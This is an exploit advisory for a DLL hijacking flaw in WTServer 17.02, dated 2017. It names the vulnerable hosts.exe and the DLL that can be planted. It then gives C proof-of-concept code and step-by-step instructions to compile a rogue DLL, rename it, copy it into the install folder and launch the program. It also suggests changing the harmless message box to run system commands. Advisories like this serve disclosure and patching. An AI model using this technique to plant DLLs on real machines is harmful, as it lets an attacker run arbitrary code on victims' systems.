[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution [+] Credits / Discovery: Nassim Asrir [+] Author Email: wassline@gmail.com [+] Author Company: Henceforth Vendor: =============== http://wtserver.wtriple.com/ Download: =========== https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory About Product: =============== WTServer - Nginx MariaDB Redis Php development stack for Windows A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP. Package contains: - Nginx 1.11.10 web server - MariaDB 10.1.21 database server, mysql replacement (32/64bit) - Redis 3.2 Cache/NoSql, memcached alternative (64bit) - Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit) - WinSCP SFTP client - HTTPS using free LetsEncrypt certificates - Composer dependency manager for php - Adminer web based database manager - Reg.php regular expressions tester - WTServer Manager (32/64bit), formerly known as *wt-nmp* Vulnerability Type: =================== DLL Loading Arbitrary Code Execution. Informations: =================== The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll". POC: =================== Download the POC from github and compile it with "CodeBlocks" or "GCC" . https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b Data: // Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" // For any informations contact me at: wassline@gmail.com #include "main.h" #include #define DllExport __declspec (dllexport) int mes() { MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK); return 0; } BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {mes();} - Download the POC and compile it and copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) . CVE Reference: =============== N/A Tested on: =============== Windows 7 Win xp # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-10]